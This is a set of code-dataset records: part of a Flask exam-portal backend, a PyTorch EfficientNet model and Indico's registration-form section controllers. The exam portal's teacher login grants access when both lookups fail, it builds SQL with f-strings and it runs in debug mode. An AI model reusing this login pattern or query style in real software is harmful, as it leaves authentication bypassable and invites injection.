teacherid=request.json[\"teacherid\"]\r\n phonenumber=request.json[\"phone_number\"]\r\n email=request.json[\"email\"]\r\n name= request.json['name']\r\n addT=Teacher(teacherid=teacherid, phonenumber=phonenumber, email=email, name=name)\r\n with app.app_context():\r\n db.session.add(addT)\r\n db.session.commit()\r\n return jsonify({'teachername': name, 'auth':True})\r\n\r\n@app.route('/teacherlogin', methods=[\"POST\",\"GET\"])\r\ndef teacherlogin():\r\n if request.method==\"POST\":\r\n teacherid=str(request.json[\"teacherid\"])\r\n phonenumber=request.json[\"phonenumber\"]\r\n with app.app_context():\r\n tidcheck1 = Teacher.query.filter_by(phonenumber=str(phonenumber)).first()\r\n tidcheck2= Teacher.query.filter_by(teacherid=teacherid).first()\r\n if(tidcheck1==tidcheck2):\r\n auth=True\r\n jsonS=jsonify({\"auth\": auth})\r\n else:\r\n auth=False\r\n jsonS= jsonify({'auth': auth, 'error': 'Invalid Credentials'})\r\n\r\n return jsonS\r\n\r\n\r\n@app.route('/entercode', methods=[\"POST\", \"GET\"])\r\ndef enterexamcode():\r\n if request.method==\"POST\":\r\n examcode= request.json['examCode']\r\n enrollment= request.json['enrollment_number']\r\n code= examcode[8:]\r\n examCode= int(code)\r\n qpaper= readDocuments(str(examcode))\r\n qp=parse_json(qpaper)\r\n with app.app_context():\r\n q12=f\"select exam_duration from exams where examid={examCode}\"\r\n q13= f\"select exam_starttime from exams where examid={examCode}\"\r\n q14= f\"select exam_startdate from exams where examid={examCode}\"\r\n q01=db.engine.execute(q12)\r\n q02 = db.engine.execute(q13)\r\n q03 = db.engine.execute(q14)\r\n l=[]\r\n for i in q01:\r\n q2=i[0]\r\n l.append(int(q2))\r\n for i in q02:\r\n q3=i[0]\r\n l.append(q3)\r\n for i in q03:\r\n q4=i[0]\r\n l.append(q4)\r\n dur= q2*60*1000\r\n nw = datetime.now()\r\n currdate=nw.strftime(\"%Y-%m-%d\")\r\n currtime= nw.strftime(\"%H:%M:%S\")\r\n if(q4==currdate):\r\n diff= datetime.strptime(q3, \"%H:%M:%S\")-datetime.strptime(currtime, \"%H:%M:%S\")\r\n ms = diff.total_seconds() * 1000\r\n else:\r\n datediff= datetime.strptime(q4, \"%Y-%m-%d\")- datetime.strptime(currdate, \"%Y-%m-%d\")\r\n diff = datetime.strptime(q3, \"%H:%M:%S\")-datetime.strptime(currtime, \"%H:%M:%S\")\r\n totaldiff= datediff*24*60*60 +diff\r\n ms = totaldiff.total_seconds() * 1000\r\n\r\n currtime0 = nw.strftime(\"%H:%M:%S\")\r\n currtime1 = datetime.strptime(currtime0, \"%H:%M:%S\")\r\n extime= datetime.strptime(q3, \"%H:%M:%S\")\r\n if(extime>=currtime1):\r\n flag=\"Positive\"\r\n else:\r\n flag=\"Negative\"\r\n examchecker= checkifexists(examcode, enrollment)\r\n\r\n return jsonify({\"questionpaper\": qp, \"remainingTime\": ms, \"duration\": dur, \"difference\": flag, \"eligibility\": examchecker})\r\n\r\n# @app.route('/markslenden', methods=[\"POST\",\"GET\"])\r\n# def marksexchanger():\r\n# if request.method==\"POST\":\r\n# enrollement_number= request.json['enrollment_number']\r\n# examid= request.json['examid']\r\n# marks= fetch_marks(examid, enrollement_number)\r\n# return jsonify({\"marks\": marks})\r\n\r\ndef parse_json(data):\r\n return json.loads(json_util.dumps(data))\r\n\r\n\r\n# with app.app_context():\r\n# ExamName= \"Midsem 1 Digital Electronics\"\r\n# q1 = f\"select examid from Exams where exam_name= {ExamName}\"\r\n# q2 = Exams.query.filter_by(exam_name=ExamName).first()\r\n# print(type(q2))\r\n# print(q2)\r\n# print(q2.examid)\r\n# nw= datetime.now()\r\n# currdate=nw.date()\r\n# currtime=nw.strftime(\"%Y-%m-%d\")\r\n# print(currdate)\r\n# print(currtime)\r\n# print(type(currtime))\r\n\r\n# with app.app_context():\r\n# tim= \"9:00:30\"\r\n# nw= datetime.now()\r\n# currtime = nw.strftime(\"%H:%M:%S\")\r\n# currtime1=datetime.strptime(currtime, \"%H:%M:%S\")\r\n# tim1= datetime.strptime(tim, \"%H:%M:%S\")\r\n# if(tim1>currtime1):\r\n# print(\"YES\")\r\n# else:\r\n# print(\"NO\")\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/student/login')\r\ndef sLogin():\r\n return render_template('index.html')\r\n\r\n@app.route('/teacher/login')\r\ndef tLogin():\r\n return render_template('index.html')\r\n\r\n@app.route('/student')\r\ndef s():\r\n return render_template('index.html')\r\n\r\n@app.route('/teacher')\r\ndef t():\r\n return render_template('index.html')\r\n\r\n@app.route('/results/')\r\ndef r(enrollment):\r\n return render_template('index.html')\r\n\r\n@app.route('/teacher//addQuestion')\r\ndef qadd(examid):\r\n return render_template('index.html')\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)", "repo_name": "Soham-Chakraborty-8455/Exam-Portal-Flask", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 13908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "twilio.rest.Client", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "twilio.rest.Client", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 102, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 104, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 111, "usage_type": "call"}, {"api_name": "mongo.insertDocument", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 160, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 160, "usage_type": "name"}, {"api_name": "mongo.checkifexists", "line_number": 161, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 163, "usage_type": "name"}, {"api_name": "mongo.appendDoc", "line_number": 164, "usage_type": "call"}, {"api_name": "mongo.fetch_marks", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 175, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 175, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 176, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 178, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 178, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 180, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 196, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 196, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 223, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 223, "usage_type": "name"}, {"api_name": "mongo.insertDocument", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 232, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 232, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 233, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 233, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 234, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 234, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 236, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 236, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 246, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 253, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 263, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 264, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 265, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 265, "usage_type": "name"}, {"api_name": "mongo.readDocuments", "line_number": 268, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 288, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 288, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 292, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 292, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 295, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 295, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 296, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 301, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 301, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 302, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 302, "usage_type": "name"}, {"api_name": "mongo.checkifexists", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 309, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 320, "usage_type": "call"}, {"api_name": "bson.json_util.dumps", "line_number": 320, "usage_type": "call"}, {"api_name": "bson.json_util", "line_number": 320, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 350, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 354, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 358, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 362, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 366, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 370, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 374, "usage_type": "call"}]}
+{"seq_id": "20120934463", "text": "# -*- coding: utf-8 -*-\n\nimport torch\nfrom torch import nn\nfrom math import ceil\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom . import BaseBlocks as bb\n\nclass EfficientNet(nn.Module):\n def __init__(self, scale_width=1, scale_depth=1, drop_rate = 0.2, output_size=1000):\n super(EfficientNet, self).__init__()\n base_widths=[\n {\n \"in_dim\":32,\n \"out_dim\":16\n },\n {\n \"in_dim\":16,\n \"out_dim\":24\n },\n {\n \"in_dim\":24,\n \"out_dim\":40\n },\n {\n \"in_dim\":40,\n \"out_dim\":80\n },\n {\n \"in_dim\":80,\n \"out_dim\":112\n },\n {\n \"in_dim\":112,\n \"out_dim\":192\n },\n {\n \"in_dim\":192,\n \"out_dim\":320\n },\n {\n \"in_dim\":320,\n \"out_dim\":1280\n }\n ]\n base_depths = [1,2,2,3,3,4,1]\n kernels = [3,3,5,3,5,5,3]\n strides = [1,2,2,2,1,2,1]\n self.drop_rate = drop_rate\n scaled_widths = []\n for i in range(len(base_widths)):\n scaled_widths.append((self.do_scale_width(base_widths[i][\"in_dim\"], scale_width), self.do_scale_width(base_widths[i][\"out_dim\"], scale_width)))\n scaled_depths = [ceil(scale_depth*d) for d in base_depths]\n drop_rates = np.linspace(self.drop_rate/sum(scaled_depths), self.drop_rate, sum(scaled_depths))\n \n self.pre = bb.ConvBlock(3, scaled_widths[0][0], kernel_size=3, stride=2, padding=1)\n mbconv_layers = []\n count=0\n for i in range(7):\n d = scaled_depths[i]\n mb_type=6\n r=24\n if i ==0:\n mb_type=1\n r=4\n lays = [bb.MBConvBlock(scaled_widths[i][0], scaled_widths[i][1], kernel_size=kernels[i], stride= strides[i], drop_prob=drop_rates[i], mb_type=mb_type, r_factor=r)]\n count+=1\n for j in range(d-1):\n lays.append(bb.MBConvBlock(scaled_widths[i][1], scaled_widths[i][1], kernel_size=kernels[i], stride= 1, drop_prob=drop_rates[count], mb_type=mb_type, r_factor=r))\n count+=1\n mbconv_layers.append(nn.Sequential(*lays))\n mbconv_layers.append(bb.ConvBlock(scaled_widths[7][0], scaled_widths[7][1], kernel_size=1, stride=1, padding=0))\n self.mbconv_layers = nn.Sequential(*mbconv_layers)\n self.head = nn.Sequential(nn.AdaptiveAvgPool2d(1),\n nn.Flatten(),\n nn.Linear(scaled_widths[-1][1], output_size))\n \n def do_scale_width(self, w, scale_factor):\n w *= scale_factor\n new_w = (int(w+4) // 8) * 8\n new_w = max(8, new_w)\n if new_w < 0.9*w:\n new_w += 8\n return int(new_w)\n \n def forward(self, x):\n x = self.pre(x)\n x = self.mbconv_layers(x)\n x = self.head(x)\n return F.log_softmax(x, dim=1)", "repo_name": "joempappas/efficientnet", "sub_path": "Nets/EfficientNet.py", "file_name": "EfficientNet.py", "file_ext": "py", "file_size_in_byte": 3131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.Flatten", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "73342142487", "text": "from flask import jsonify, request, session\nfrom werkzeug.exceptions import BadRequest\n\nfrom indico.core.db import db\nfrom indico.modules.events.registration import logger\nfrom indico.modules.events.registration.controllers.management import RHManageRegFormBase\nfrom indico.modules.events.registration.models.items import RegistrationFormItemType, RegistrationFormSection\nfrom indico.modules.events.registration.util import get_flat_section_positions_setup_data, update_regform_item_positions\nfrom indico.modules.logs.models.entries import EventLogRealm, LogKind\nfrom indico.modules.logs.util import make_diff_log\nfrom indico.web.util import jsonify_data\n\n\nclass RHManageRegFormSectionBase(RHManageRegFormBase):\n \"\"\"Base class for a specific registration form section.\"\"\"\n\n normalize_url_spec = {\n 'locators': {\n lambda self: self.section\n }\n }\n\n def _process_args(self):\n RHManageRegFormBase._process_args(self)\n self.section = RegistrationFormSection.get_or_404(request.view_args['section_id'])\n\n\nclass RHRegistrationFormAddSection(RHManageRegFormBase):\n \"\"\"Add a section to the registration form.\"\"\"\n\n def _process(self):\n section = RegistrationFormSection(registration_form=self.regform)\n section.title = request.json['title']\n section.description = request.json.get('description')\n section.is_manager_only = request.json.get('is_manager_only', False)\n db.session.add(section)\n db.session.flush()\n section.log(\n EventLogRealm.management, LogKind.positive, 'Registration',\n f'Section \"{section.title}\" in \"{self.regform.title}\" added', session.user,\n data={'Manager-only': section.is_manager_only}\n )\n logger.info('Section %s created by %s', section, session.user)\n return jsonify(section.view_data)\n\n\nclass RHRegistrationFormModifySection(RHManageRegFormSectionBase):\n \"\"\"Delete/modify a section.\"\"\"\n\n def _process_DELETE(self):\n if self.section.type == RegistrationFormItemType.section_pd:\n raise BadRequest\n self.section.is_deleted = True\n db.session.flush()\n self.section.log(\n EventLogRealm.management, LogKind.negative, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" deleted', session.user\n )\n logger.info('Section %s deleted by %s', self.section, session.user)\n return jsonify(success=True)\n\n def _process_PATCH(self):\n changes = request.json['changes']\n if set(changes.keys()) > {'title', 'description', 'is_manager_only'}:\n raise BadRequest\n if self.section.type == RegistrationFormItemType.section_pd and changes.get('is_manager_only'):\n raise BadRequest\n changes = self.section.populate_from_dict(changes)\n db.session.flush()\n changes = make_diff_log(changes, {\n 'title': {'title': 'Title', 'type': 'string'},\n 'description': {'title': 'Description'},\n 'is_manager_only': {'title': 'Manager-only'},\n })\n self.section.log(\n EventLogRealm.management, LogKind.change, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" modified', session.user,\n data={'Changes': changes}\n )\n logger.info('Section %s modified by %s: %s', self.section, session.user, changes)\n return jsonify(self.section.view_data)\n\n\nclass RHRegistrationFormToggleSection(RHManageRegFormSectionBase):\n \"\"\"Enable/disable a section.\"\"\"\n\n def _process_POST(self):\n enabled = request.args.get('enable') == 'true'\n if not enabled and self.section.type == RegistrationFormItemType.section_pd:\n raise BadRequest\n self.section.is_enabled = enabled\n update_regform_item_positions(self.regform)\n db.session.flush()\n if self.section.is_enabled:\n self.section.log(\n EventLogRealm.management, LogKind.positive, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" enabled', session.user\n )\n logger.info('Section %s enabled by %s', self.section, session.user)\n else:\n self.section.log(\n EventLogRealm.management, LogKind.negative, 'Registration',\n f'Section \"{self.section.title}\" in \"{self.regform.title}\" disabled', session.user\n )\n logger.info('Section %s disabled by %s', self.section, session.user)\n return jsonify_data(view_data=self.section.view_data,\n positions=get_flat_section_positions_setup_data(self.regform))\n\n\nclass RHRegistrationFormMoveSection(RHManageRegFormSectionBase):\n \"\"\"Move a section within the registration form.\"\"\"\n\n def _process(self):\n new_position = request.json['endPos'] + 1\n old_position = self.section.position\n if new_position == old_position:\n return jsonify(success=True)\n elif new_position < old_position:\n def fn(section):\n return (section.position >= new_position and section.id != self.section.id and not section.is_deleted\n and section.is_enabled)\n start_enum = new_position + 1\n else:\n def fn(section):\n return (old_position < section.position <= new_position and section.id != self.section.id\n and not section.is_deleted and section.is_enabled)\n start_enum = self.section.position\n to_update = list(filter(fn,\n RegistrationFormSection.query\n .filter_by(registration_form=self.regform, is_deleted=False)\n .order_by(RegistrationFormSection.position)\n .all()))\n self.section.position = new_position\n for pos, section in enumerate(to_update, start_enum):\n section.position = pos\n db.session.flush()\n return jsonify(success=True)\n", "repo_name": "indico/indico", "sub_path": "indico/modules/events/registration/controllers/management/sections.py", "file_name": "sections.py", "file_ext": "py", "file_size_in_byte": 6092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1560, "dataset": "github-code", "pt": "31", "api": [{"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase", "line_number": 14, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase._process_args", "line_number": 24, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase", "line_number": 24, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection.get_or_404", "line_number": 25, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.view_args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.controllers.management.RHManageRegFormBase", "line_number": 28, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormSection", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.add", "line_number": 36, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 36, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 37, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 37, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 37, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 39, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 39, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.positive", "line_number": 39, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 43, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 44, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType.section_pd", "line_number": 51, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType", "line_number": 51, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 52, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 54, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 54, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 54, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 56, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 56, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.negative", "line_number": 56, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 57, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 59, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 65, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType.section_pd", "line_number": 66, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType", "line_number": 66, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 67, "usage_type": "name"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 69, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 69, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 69, "usage_type": "name"}, {"api_name": "indico.modules.logs.util.make_diff_log", "line_number": 70, "usage_type": "call"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 76, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 76, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.change", "line_number": 76, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 77, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 80, "usage_type": "call"}, {"api_name": "indico.modules.events.registration.logger", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType.section_pd", "line_number": 89, "usage_type": "attribute"}, {"api_name": "indico.modules.events.registration.models.items.RegistrationFormItemType", "line_number": 89, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 90, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.util.update_regform_item_positions", "line_number": 92, "usage_type": "call"}, {"api_name": "indico.core.db.db.session.flush", "line_number": 93, "usage_type": "call"}, {"api_name": "indico.core.db.db.session", "line_number": 93, "usage_type": "attribute"}, {"api_name": "indico.core.db.db", "line_number": 93, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm.management", "line_number": 96, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.EventLogRealm", "line_number": 96, "usage_type": "name"}, {"api_name": "indico.modules.logs.models.entries.LogKind.positive", "line_number": 96, "usage_type": "attribute"}, {"api_name": "indico.modules.logs.models.entries.LogKind", "line_number": 96, "usage_type": "name"}, {"api_name": "flask.session.user", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 97, "usage_type": "name"}, {"api_name": "indico.modules.events.registration.logger.info", "line_number": 99, 